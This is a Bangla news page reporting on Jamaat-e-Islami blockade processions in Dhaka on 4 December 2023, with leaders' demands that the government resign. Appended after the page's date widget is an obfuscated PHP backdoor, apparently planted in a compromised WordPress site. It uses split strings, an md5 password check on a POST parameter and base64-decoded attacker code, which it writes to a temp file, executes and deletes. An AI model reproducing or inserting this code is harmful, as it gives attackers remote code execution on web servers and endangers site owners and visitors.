• বুধবার, ২৬ জুন ২০২৪, ১২:৪১ পূর্বাহ্ন
সর্বশেষ খবর
শুধু এক টুকরো মাংস চায়, তাড়িয়ে দিলেও বার বার হাত বাড়ায় সৈকতে ঘুরতে গিয়ে দুর্বৃত্তের ছুরিকাঘাতে নিহত হোটেল কর্মী ঈদগাঁওতে পুকুরে ডুবে আদিবা-ইলমার মৃত্যু প্রথমবারের মতো প্রধানমন্ত্রীর সফর সঙ্গী হতে যাচ্ছেন নবনিযুক্ত প্রেস সচিব নাইমুল ইসলাম খান   সন্দ্বীপে যুবকের বিরুদ্ধে ভিসা দেয়ার নামে টাকা হাতিয়ে নেয়ার অভিযোগ : ভুক্তভোগীর উপর হামলা পাসপোর্ট ফিরে পেতে প্রধানমন্ত্রী ও ডিজির হস্তক্ষেপ কামনা :৪ বছরেও নাবায়ন হয়নি নির্যাতিত সাংবাদিক ফরিদুলের ডিজিটাল পাসপোর্ট শপথ গ্রহণ করেছেন কক্সবাজারের ৩ উপজেলা পরিষদের নবনির্বাচিত চেয়ারম্যান কক্সবাজারে ৬ নং বিপদ সংকেত  কক্সবাজারে মাংসের বাজারে কসাইদের অরাজকতা, বিক্রি হচ্ছে অন্য প্রাণীর গোস্ত বন্দরে ৩ নম্বর সংকেত,উপকূলে ১০ফুট জলোচ্ছ্বাসের আশংকা

অবরোধের সমর্থনে ঢাকায় জামায়াতের বিক্ষোভ ও মিছিল

শাহাদাত হোসেন :
আপডেট : সোমবার, ৪ ডিসেম্বর, ২০২৩


শাহাদাত হোসেন:


সরকারের পদত্যাগের দাবিতে অবরোধের সমর্থনে ঢাকায় বিক্ষোভ ও মিছিল করেছে বাংলাদেশ জামায়াতে ইসলামী। সোমবার সকালে ঢাকা মহানগর উত্তর ও দক্ষিণ জামায়াতের উদ্যোগে মিরপুরে-১, বাড্ডা-রামপুরা, শেওড়াপাড়া, মতিঝিল, সবুজবাগ, লালবাগ, হাজারীবাগ, ডেমরা এবং শনির আখড়াসহ বিভিন্ন ওয়ার্ড ও থানায় এসব মিছিল অনুষ্ঠিত হয়। সকালে ঢাকা মহানগর উত্তরের উদ্যোগে মিরপুরে-১ রাজপথ অবরোধ করে বিক্ষোভ মিছিল করেছেন নেতাকর্মীরা।

এই বিক্ষোভ মিছিল শেষে ঢাকা মহানগর উত্তর জামায়াতের সহকারি সেক্রেটারি জেনারেল মাহফুজুর রহমান বলেন, সরকার কথিত নির্বাচনের নামে রাজনৈতিক ভিক্ষুকদের মাধ্যমে চরদখলের আয়োজন করে রাষ্ট্রীয় ক্ষমতা আবারো কুক্ষিগত করার নতুন ষড়যন্ত্র শুরু করছে। কিন্তু জনগণ তাদের সে ষড়যন্ত্র ও উচ্চাভিলাষ কোনভাবেই বাস্তবায়িত হতে দেবে না।

নির্বাচন নিয়ে খেলতামাশা না করে সরকারকে অবিলম্বে পদত্যাগ ও কেয়ারটেকার সরকারের হাতে ক্ষমতা হস্তান্তরের আহ্বান জানান তিনি।

অবরোধের দ্বিতীয় দিনে রাজধানীর বাড্ডা-রামপুরা অঞ্চলে সড়ক অবরোধ করে মিছিল করেছেন নেতাকর্মীরা। এই মিছিলে নেতৃত্ব দেন উত্তরের মজলিসে শূরা সদস্য আব্দুস সবুর ফরহাদ। শেওড়াপাড়ায় অবরোধের সমর্থনে মিছিল করেছেন নেতাকর্মীরা। উত্তরের কর্মপরিষদ সদস্য মো. টুটুলের নেতৃত্বে মিছিলটি শেওড়াপাড়া থেকে শুরু হয়ে ৬০ ফুট রাস্তায় গিয়ে শেষ হয়।

এদিকে রাজধানীর মতিঝিল এলাকায় সড়ক অবরোধ করে মিছিল করেছেন ঢাকা মহানগর দক্ষিণ জামায়াতের নেতাকর্মীরা। এই মিছিলে নেতৃত্ব দেন দক্ষিণের সহকারী সেক্রেটারি জেনারেল ড. মু. আবদুল মান্নান। সকালে সবুজবাগে সড়ক অবরোধ করে মিছিল করেছেন নেতাকর্মীরা। এতে নেতৃত্ব দেন দক্ষিণের মজলিসে শূরা সদস্য মতিউর রহমান।

 

শনির আখড়ায় সড়ক অবরোধ করে মিছিল করেছেন নেতাকর্মীরা। মিছিলে স্থানীয় যুবলীগ ও ছাত্রলীগের কর্মীরা বাধা দিতে আসলে উত্তেজনা ছড়িয়ে পড়ে। পরে জামায়াতের কর্মীদের ধাওয়ায় তারা স্থান ত্যাগ করে চলে যায়। এই মিছিলে নেতৃত্ব দেন দক্ষিণের কর্মপরিষদ সদস্য ড. মোবারক হোসাইন।

এছাড়া লালবাগ, হাজারীবাগ এবং ডেমরায়ও অবরোধের সমর্থনে মিছিল করেছেন দক্ষিণ জামায়াতের নেতাকর্মীরা।


আরো বিভন্ন নিউজ দেখুন

ই-পেপার

আজকের দিন-তারিখ

  • বুধবার (রাত ১২:৪১)
  • ২৬শে জুন, ২০২৪ খ্রিস্টাব্দ
  • ২০শে জিলহজ, ১৪৪৫ হিজরি
  • ১২ই আষাঢ়, ১৪৩১ বঙ্গাব্দ (বর্ষাকাল)
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}